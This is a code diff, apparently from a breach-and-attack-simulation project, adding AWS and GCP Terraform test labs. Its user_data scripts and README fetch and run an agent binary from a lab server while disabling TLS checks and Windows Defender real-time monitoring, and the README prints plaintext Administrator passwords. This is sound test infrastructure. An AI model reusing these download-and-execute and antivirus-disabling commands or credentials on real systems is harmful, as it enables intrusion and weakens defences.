@ -150,10 +150,10 @@ resource "google_compute_instance_from_template" "shellshock-8" {
resource "google_compute_instance_from_template" "tunneling-9" { resource "google_compute_instance_from_template" "tunneling-9" {
name = "${local.resource_prefix}tunneling-9" name = "${local.resource_prefix}tunneling-9"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.tunneling-9.self_link}" image = data.google_compute_image.tunneling-9.self_link
} }
auto_delete = true auto_delete = true
} }
@ -169,10 +169,10 @@ resource "google_compute_instance_from_template" "tunneling-9" {
resource "google_compute_instance_from_template" "tunneling-10" { resource "google_compute_instance_from_template" "tunneling-10" {
name = "${local.resource_prefix}tunneling-10" name = "${local.resource_prefix}tunneling-10"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.tunneling-10.self_link}" image = data.google_compute_image.tunneling-10.self_link
} }
auto_delete = true auto_delete = true
} }
@ -188,10 +188,10 @@ resource "google_compute_instance_from_template" "tunneling-10" {
resource "google_compute_instance_from_template" "tunneling-11" { resource "google_compute_instance_from_template" "tunneling-11" {
name = "${local.resource_prefix}tunneling-11" name = "${local.resource_prefix}tunneling-11"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.tunneling-11.self_link}" image = data.google_compute_image.tunneling-11.self_link
} }
auto_delete = true auto_delete = true
} }
@ -201,12 +201,27 @@ resource "google_compute_instance_from_template" "tunneling-11" {
} }
} }
resource "google_compute_instance_from_template" "sshkeys-11" { resource "google_compute_instance_from_template" "tunneling-12" {
name = "${local.resource_prefix}sshkeys-11" name = "${local.resource_prefix}tunneling-12"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.sshkeys-11.self_link}" image = data.google_compute_image.tunneling-12.self_link
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling2-main"
network_ip="10.2.0.12"
}
}
resource "google_compute_instance_from_template" "sshkeys-11" {
name = "${local.resource_prefix}sshkeys-11"
source_instance_template = local.default_ubuntu
boot_disk{
initialize_params {
image = data.google_compute_image.sshkeys-11.self_link
} }
auto_delete = true auto_delete = true
} }
@ -218,10 +233,10 @@ resource "google_compute_instance_from_template" "sshkeys-11" {
resource "google_compute_instance_from_template" "sshkeys-12" { resource "google_compute_instance_from_template" "sshkeys-12" {
name = "${local.resource_prefix}sshkeys-12" name = "${local.resource_prefix}sshkeys-12"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.sshkeys-12.self_link}" image = data.google_compute_image.sshkeys-12.self_link
} }
auto_delete = true auto_delete = true
} }
@ -249,10 +264,10 @@ resource "google_compute_instance_from_template" "rdpgrinder-13" {
resource "google_compute_instance_from_template" "mimikatz-14" { resource "google_compute_instance_from_template" "mimikatz-14" {
name = "${local.resource_prefix}mimikatz-14" name = "${local.resource_prefix}mimikatz-14"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mimikatz-14.self_link}" image = data.google_compute_image.mimikatz-14.self_link
} }
auto_delete = true auto_delete = true
} }
@ -264,10 +279,10 @@ resource "google_compute_instance_from_template" "mimikatz-14" {
resource "google_compute_instance_from_template" "mimikatz-15" { resource "google_compute_instance_from_template" "mimikatz-15" {
name = "${local.resource_prefix}mimikatz-15" name = "${local.resource_prefix}mimikatz-15"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mimikatz-15.self_link}" image = data.google_compute_image.mimikatz-15.self_link
} }
auto_delete = true auto_delete = true
} }
@ -279,10 +294,10 @@ resource "google_compute_instance_from_template" "mimikatz-15" {
resource "google_compute_instance_from_template" "mssql-16" { resource "google_compute_instance_from_template" "mssql-16" {
name = "${local.resource_prefix}mssql-16" name = "${local.resource_prefix}mssql-16"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mssql-16.self_link}" image = data.google_compute_image.mssql-16.self_link
} }
auto_delete = true auto_delete = true
} }
@ -314,10 +329,10 @@ resource "google_compute_instance_from_template" "upgrader-17" {
resource "google_compute_instance_from_template" "weblogic-18" { resource "google_compute_instance_from_template" "weblogic-18" {
name = "${local.resource_prefix}weblogic-18" name = "${local.resource_prefix}weblogic-18"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.weblogic-18.self_link}" image = data.google_compute_image.weblogic-18.self_link
} }
auto_delete = true auto_delete = true
} }
@ -329,10 +344,10 @@ resource "google_compute_instance_from_template" "weblogic-18" {
resource "google_compute_instance_from_template" "weblogic-19" { resource "google_compute_instance_from_template" "weblogic-19" {
name = "${local.resource_prefix}weblogic-19" name = "${local.resource_prefix}weblogic-19"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.weblogic-19.self_link}" image = data.google_compute_image.weblogic-19.self_link
} }
auto_delete = true auto_delete = true
} }
@ -344,10 +359,10 @@ resource "google_compute_instance_from_template" "weblogic-19" {
resource "google_compute_instance_from_template" "smb-20" { resource "google_compute_instance_from_template" "smb-20" {
name = "${local.resource_prefix}smb-20" name = "${local.resource_prefix}smb-20"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.smb-20.self_link}" image = data.google_compute_image.smb-20.self_link
} }
auto_delete = true auto_delete = true
} }
@ -359,10 +374,10 @@ resource "google_compute_instance_from_template" "smb-20" {
resource "google_compute_instance_from_template" "scan-21" { resource "google_compute_instance_from_template" "scan-21" {
name = "${local.resource_prefix}scan-21" name = "${local.resource_prefix}scan-21"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.scan-21.self_link}" image = data.google_compute_image.scan-21.self_link
} }
auto_delete = true auto_delete = true
} }
@ -374,10 +389,10 @@ resource "google_compute_instance_from_template" "scan-21" {
resource "google_compute_instance_from_template" "scan-22" { resource "google_compute_instance_from_template" "scan-22" {
name = "${local.resource_prefix}scan-22" name = "${local.resource_prefix}scan-22"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.scan-22.self_link}" image = data.google_compute_image.scan-22.self_link
} }
auto_delete = true auto_delete = true
} }
@ -389,10 +404,10 @@ resource "google_compute_instance_from_template" "scan-22" {
resource "google_compute_instance_from_template" "struts2-23" { resource "google_compute_instance_from_template" "struts2-23" {
name = "${local.resource_prefix}struts2-23" name = "${local.resource_prefix}struts2-23"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.struts2-23.self_link}" image = data.google_compute_image.struts2-23.self_link
} }
auto_delete = true auto_delete = true
} }
@ -404,10 +419,10 @@ resource "google_compute_instance_from_template" "struts2-23" {
resource "google_compute_instance_from_template" "struts2-24" { resource "google_compute_instance_from_template" "struts2-24" {
name = "${local.resource_prefix}struts2-24" name = "${local.resource_prefix}struts2-24"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.struts2-24.self_link}" image = data.google_compute_image.struts2-24.self_link
} }
auto_delete = true auto_delete = true
} }
@ -421,10 +436,10 @@ resource "google_compute_instance_from_template" "island-linux-250" {
name = "${local.resource_prefix}island-linux-250" name = "${local.resource_prefix}island-linux-250"
machine_type = "n1-standard-2" machine_type = "n1-standard-2"
tags = ["island", "linux", "ubuntu16"] tags = ["island", "linux", "ubuntu16"]
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.island-linux-250.self_link}" image = data.google_compute_image.island-linux-250.self_link
} }
auto_delete = true auto_delete = true
} }
@ -442,10 +457,10 @@ resource "google_compute_instance_from_template" "island-windows-251" {
name = "${local.resource_prefix}island-windows-251" name = "${local.resource_prefix}island-windows-251"
machine_type = "n1-standard-2" machine_type = "n1-standard-2"
tags = ["island", "windows", "windowsserver2016"] tags = ["island", "windows", "windowsserver2016"]
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.island-windows-251.self_link}" image = data.google_compute_image.island-windows-251.self_link
} }
auto_delete = true auto_delete = true
} }

View File

@ -18,7 +18,7 @@ resource "google_compute_instance_template" "ubuntu16" {
} }
} }
service_account { service_account {
email ="${local.service_account_email}" email =local.service_account_email
scopes=["cloud-platform"] scopes=["cloud-platform"]
} }
} }
@ -39,7 +39,7 @@ resource "google_compute_instance_template" "windows2016" {
subnetwork="monkeyzoo-main" subnetwork="monkeyzoo-main"
} }
service_account { service_account {
email="${local.service_account_email}" email=local.service_account_email
scopes=["cloud-platform"] scopes=["cloud-platform"]
} }
} }

View File

@ -0,0 +1,79 @@
# OS compatibility
## About
OS compatibility is an environment on AWS that
is designed to test monkey binary compatibility on
different operating systems.
This environment is deployed using terraform scripts
located in this directory.
## Setup
To setup you need to put `accessKeys` file into `./aws_keys` directory.
Contents of `accessKeys` file should be as follows:
```
[default]
aws_access_key_id = <...>
aws_secret_access_key = <...>
```
Also review `./terraform/config.tf` file.
Launch the environment by going into `terraform` folder and running
```angular2html
terraform init
terraform apply
```
## Usage
0. Add your machine's IP to the `os_compat_island` security group ingress rules.
1. Launch os_compat_ISLAND machine and upload your binaries/update island. Reset island environment.
2. Launch/Reboot all other os_compat test machines (Can be filtered with tag "Purpose: os_compat_instance")
3. Wait until machines boot and run monkey
4. Launch `test_compatibility.py` pytest script with island ip parameter
(e.g. `test_compatibility.py --island 111.111.111.111:5000`)
## Machines
Since island machine is built from custom AMI it already has the following credentials:
Administrator: %tPHGz8ZuQsBnEUgdpz!6f&elGnFy?;.
For windows_2008_r2 Administrator:AGE(MP..txL
The following machines does not download monkey automatically, so you'll have to manually check them:
- os_compat_kali_2019
- os_compat_oracle_6
- os_compat_oracle_7
- windows_2003_r2_32
- windows_2003
- windows_2008_r2
A quick reference for usernames on different machines (if in doubt check official docs):
- Ubuntu: ubuntu
- Oracle: clckwrk
- CentOS: centos
- Everything else: ec2-user
To manually verify the machine is compatible use commands to download and execute the monkey.
Also, add your IP to `os_compat_instance` security group.
Example commands:
- Powershell:
```cmd
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
```
- Bash:
```shell script
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
chmod +x ./monkey-linux-64
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
```

View File

@ -0,0 +1,4 @@
# Ignore everything in this directory
*
# Except this file
!.gitignore

View File

@ -0,0 +1,11 @@
import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
@pytest.fixture(scope='module')
def island(request):
return request.config.getoption("--island")

View File

@ -0,0 +1,5 @@
provider "aws" {
version = "~> 2.0"
region = "eu-central-1"
shared_credentials_file = "../aws_keys/accessKeys"
}

View File

@ -0,0 +1,92 @@
resource "aws_vpc" "os_compat_vpc" {
cidr_block = "10.0.0.0/24"
enable_dns_support = true
tags = {
Name = "os_compat_vpc"
}
}
resource "aws_internet_gateway" "os_compat_gateway" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
tags = {
Name = "os_compat_gateway"
}
}
// create routing table which points to the internet gateway
resource "aws_route_table" "os_compat_route" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
route {
cidr_block = "0.0.0.0/0"
gateway_id = "${aws_internet_gateway.os_compat_gateway.id}"
}
tags = {
Name = "os_compat_route"
}
}
// associate the routing table with the subnet
resource "aws_route_table_association" "subnet-association" {
subnet_id = "${aws_subnet.main.id}"
route_table_id = "${aws_route_table.os_compat_route.id}"
}
resource "aws_subnet" "main" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
cidr_block = "10.0.0.0/24"
tags = {
Name = "Main"
}
}
resource "aws_security_group" "os_compat_island" {
name = "os_compat_island"
description = "Allow remote access to the island"
vpc_id = "${aws_vpc.os_compat_vpc.id}"
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/24"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "os_compat_island"
}
}
resource "aws_security_group" "os_compat_instance" {
name = "os_compat_instance"
description = "Allow remote access to the machines"
vpc_id = "${aws_vpc.os_compat_vpc.id}"
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/24"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "os_compat_instance"
}
}

View File

@ -0,0 +1,14 @@
resource "aws_instance" "os_test_machine" {
ami = "${var.ami}"
instance_type = "${var.type}"
private_ip = "${var.ip}"
subnet_id = "${data.aws_subnet.main.id}"
key_name = "os_compat"
tags = {
Name = "os_compat_${var.name}"
Purpose = "os_compat_instance"
}
vpc_security_group_ids = ["${data.aws_security_group.os_compat_instance.id}"]
associate_public_ip_address = true
user_data = "${var.user_data}"
}

View File

@ -0,0 +1,25 @@
variable "ami" {type=string}
variable "ip" {type=string}
variable "name" {type=string}
variable "type" {
type=string
default="t2.micro"
}
variable "user_data" {
type=string
default=""
}
variable "env_vars" {
type = object({
subnet_id = string
vpc_security_group_ids = string
})
}
data "aws_subnet" "main" {
id = "${var.env_vars.subnet_id}"
}
data "aws_security_group" "os_compat_instance" {
id = "${var.env_vars.vpc_security_group_ids}"
}

View File

@ -0,0 +1,371 @@
// Instances of machines in os_compat environment
// !!! Don't forget to add machines to test_compatibility.py if you add here !!!
resource "aws_instance" "island" {
ami = "ami-004f0217ce761fc9a"
instance_type = "t2.micro"
private_ip = "10.0.0.251"
subnet_id = "${aws_subnet.main.id}"
key_name = "os_compat"
tags = {
Name = "os_compat_ISLAND"
}
vpc_security_group_ids = ["${aws_security_group.os_compat_island.id}"]
associate_public_ip_address = true
root_block_device {
volume_size = "30"
volume_type = "standard"
delete_on_termination = true
}
}
locals {
env_vars = {
subnet_id = "${aws_subnet.main.id}"
vpc_security_group_ids = "${aws_security_group.os_compat_instance.id}"
}
user_data_linux_64 = <<EOF
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
rm ./monkey-linux-64
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
chmod +x ./monkey-linux-64
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
--//
EOF
user_data_linux_32 = <<EOF
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
rm ./monkey-linux-32
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -O ./monkey-linux-32 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -k -o monkey-linux-32
chmod +x ./monkey-linux-32
./monkey-linux-32 m0nk3y -s 10.0.0.251:5000
--//
EOF
user_data_windows_64 = <<EOF
<powershell>
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
</powershell>
<persist>true</persist>
EOF
user_data_windows_32 = <<EOF
<powershell>
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-32.exe' -OutFile 'C:\windows\temp\monkey-windows-32.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-32.exe m0nk3y -s 10.0.0.251:5000
</powershell>
<persist>true</persist>
EOF
}
module "centos_6" {
source = "./instance_template"
name = "centos_6"
ami = "ami-07fa74e425f2abf29"
ip = "10.0.0.36"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "centos_7" {
source = "./instance_template"
name = "centos_7"
ami = "ami-0034b52a39b9fb0e8"
ip = "10.0.0.37"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "centos_8" {
source = "./instance_template"
name = "centos_8"
ami = "ami-0034c84e4e9c557bd"
ip = "10.0.0.38"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "suse_12" {
source = "./instance_template"
name = "suse_12"
ami = "ami-07b12b913a7e36b08"
ip = "10.0.0.42"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "suse_11" {
source = "./instance_template"
name = "suse_11"
ami = "ami-0083986c"
ip = "10.0.0.41"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "kali_2019" {
source = "./instance_template"
name = "kali_2019"
ami = "ami-05d64b1d0f967d4bf"
ip = "10.0.0.99"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
// Requires m3.medium which usually isn't available
//module "rhel_5" {
// source = "./instance_template"
// name = "rhel_5"
// ami = "ami-a48cbfb9"
// type = "m3.medium"
// ip = "10.0.0.85"
// env_vars = "${local.env_vars}"
// user_data = "${local.user_data_linux_64}"
//}
module "rhel_6" {
source = "./instance_template"
name = "rhel_6"
ami = "ami-0af3f0e0918f47bcf"
ip = "10.0.0.86"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "rhel_7" {
source = "./instance_template"
name = "rhel_7"
ami = "ami-0b5edb134b768706c"
ip = "10.0.0.87"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "rhel_8" {
source = "./instance_template"
name = "rhel_8"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.88"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_7" {
source = "./instance_template"
name = "debian_7"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.77"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_8" {
source = "./instance_template"
name = "debian_8"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.78"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "debian_9" {
source = "./instance_template"
name = "debian_9"
ami = "ami-0badcc5b522737046"
ip = "10.0.0.79"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "oracle_6" {
source = "./instance_template"
name = "oracle_6"
ami = "ami-0f9b69f34108a3770"
ip = "10.0.0.66"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "oracle_7" {
source = "./instance_template"
name = "oracle_7"
ami = "ami-001e494dc0f3372bc"
ip = "10.0.0.67"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "ubuntu_12" {
source = "./instance_template"
name = "ubuntu_12"
ami = "ami-003d0b1d"
ip = "10.0.0.22"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
// Requires m3.medium instance which usually isn't available
// module "ubuntu_12_32" {
// source = "./instance_template"
// name = "ubuntu_12_32"
// ami = "ami-06003c1b"
// ip = "10.0.0.23"
// env_vars = "${local.env_vars}"
// user_data = "${local.user_data_linux_32}"
// }
module "ubuntu_14" {
source = "./instance_template"
name = "ubuntu_14"
ami = "ami-067ee10914e74ffee"
ip = "10.0.0.24"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "ubuntu_19" {
source = "./instance_template"
name = "ubuntu_19"
ami = "ami-001b87954b72ea3ac"
ip = "10.0.0.29"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "windows_2003_r2_32" {
source = "./instance_template"
name = "windows_2003_r2_32"
ami = "ami-01e4fa6d"
ip = "10.0.0.4"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2003" {
source = "./instance_template"
name = "windows_2003"
ami = "ami-9e023183"
ip = "10.0.0.5"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2008_r2" {
source = "./instance_template"
name = "windows_2008_r2"
ami = "ami-05af5509c2c73e36e"
ip = "10.0.0.8"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2008_32" {
source = "./instance_template"
name = "windows_2008_32"
ami = "ami-3606352b"
ip = "10.0.0.6"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_32}"
}
module "windows_2012" {
source = "./instance_template"
name = "windows_2012"
ami = "ami-0d8c60e4d3ca36ed6"
ip = "10.0.0.12"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2012_r2" {
source = "./instance_template"
name = "windows_2012_r2"
ami = "ami-08dcceb529e70f875"
ip = "10.0.0.11"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2016" {
source = "./instance_template"
name = "windows_2016"
ami = "ami-02a6791b44938cfcd"
ip = "10.0.0.116"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}
module "windows_2019" {
source = "./instance_template"
name = "windows_2019"
ami = "ami-09fe2745618d2af42"
ip = "10.0.0.119"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_windows_64}"
}

View File

@ -0,0 +1,62 @@
import pytest
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
machine_list = {
"10.0.0.36": "centos_6",
"10.0.0.37": "centos_7",
"10.0.0.38": "centos_8",
"10.0.0.42": "suse_12",
"10.0.0.41": "suse_11",
"10.0.0.99": "kali_2019",
"10.0.0.86": "rhel_6",
"10.0.0.87": "rhel_7",
"10.0.0.88": "rhel_8",
"10.0.0.77": "debian_7",
"10.0.0.78": "debian_8",
"10.0.0.79": "debian_9",
"10.0.0.66": "oracle_6",
"10.0.0.67": "oracle_7",
"10.0.0.22": "ubuntu_12",
"10.0.0.24": "ubuntu_14",
"10.0.0.29": "ubuntu_19",
"10.0.0.4": "windows_2003_r2_32",
"10.0.0.5": "windows_2003",
"10.0.0.8": "windows_2008",
"10.0.0.6": "windows_2008_32",
"10.0.0.12": "windows_2012",
"10.0.0.11": "windows_2012_r2",
"10.0.0.116": "windows_2016",
"10.0.0.119": "windows_2019",
}
@pytest.fixture(scope='class')
def island_client(island):
island_client_object = MonkeyIslandClient(island)
yield island_client_object
@pytest.mark.usefixtures('island_client')
# noinspection PyUnresolvedReferences
class TestOSCompatibility(object):
def test_os_compat(self, island_client):
print()
all_monkeys = island_client.get_all_monkeys_from_db()
ips_that_communicated = []
for monkey in all_monkeys:
for ip in monkey['ip_addresses']:
if ip in machine_list:
ips_that_communicated.append(ip)
break
for ip, os in machine_list.items():
if ip not in ips_that_communicated:
print("{} didn't communicate to island".format(os))
if len(ips_that_communicated) < len(machine_list):
assert False

20
monkey/codecov.yml Normal file
View File

@ -0,0 +1,20 @@
codecov:
require_ci_to_pass: yes
coverage:
precision: 2
round: down
range: "50...90"
parsers:
gcov:
branch_detection:
conditional: yes
loop: yes
method: no
macro: no
comment:
layout: "reach,diff,flags,tree"
behavior: default
require_changes: no

1
monkey/common/BUILD Normal file
View File

@ -0,0 +1 @@
dev

View File

@ -0,0 +1,12 @@
from typing import List
from common.cloud.aws.aws_instance import AwsInstance
from common.cloud.azure.azure_instance import AzureInstance
from common.cloud.gcp.gcp_instance import GcpInstance
from common.cloud.instance import CloudInstance
all_cloud_instances = [AwsInstance(), AzureInstance(), GcpInstance()]
def get_all_cloud_instances() -> List[CloudInstance]:
return all_cloud_instances

View File

View File

@ -1,23 +1,30 @@
import json import json
import re import re
import urllib2 import urllib.request
import urllib.error
import logging import logging
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId" ACCOUNT_ID_KEY = "accountId"
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
class AwsInstance(object): class AwsInstance(CloudInstance):
""" """
Class which gives useful information about the current instance you're on. Class which gives useful information about the current instance you're on.
""" """
def is_instance(self):
return self.instance_id is not None
def get_cloud_provider_name(self) -> Environment:
return Environment.AWS
def __init__(self): def __init__(self):
self.instance_id = None self.instance_id = None
@ -25,19 +32,20 @@ class AwsInstance(object):
self.account_id = None self.account_id = None
try: try:
self.instance_id = urllib2.urlopen( self.instance_id = urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read() AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
self.region = self._parse_region( self.region = self._parse_region(
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read()) urllib.request.urlopen(
except (urllib2.URLError, IOError) as e: AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True) except (urllib.error.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try: try:
self.account_id = self._extract_account_id( self.account_id = self._extract_account_id(
urllib2.urlopen( urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read()) AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read().decode())
except (urllib2.URLError, IOError) as e: except (urllib.error.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message)) logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
@staticmethod @staticmethod
def _parse_region(region_url_response): def _parse_region(region_url_response):
@ -57,9 +65,6 @@ class AwsInstance(object):
def get_region(self): def get_region(self):
return self.region return self.region
def is_aws_instance(self):
return self.instance_id is not None
@staticmethod @staticmethod
def _extract_account_id(instance_identity_document_response): def _extract_account_id(instance_identity_document_response):
""" """

View File

@ -4,7 +4,7 @@ import boto3
import botocore import botocore
from botocore.exceptions import ClientError from botocore.exceptions import ClientError
from common.cloud.aws_instance import AwsInstance from common.cloud.aws.aws_instance import AwsInstance
__author__ = ['itay.mizeretz', 'shay.nehmad'] __author__ = ['itay.mizeretz', 'shay.nehmad']
@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName'
PLATFORM_TYPE_KEY = 'PlatformType' PLATFORM_TYPE_KEY = 'PlatformType'
IP_ADDRESS_KEY = 'IPAddress' IP_ADDRESS_KEY = 'IPAddress'
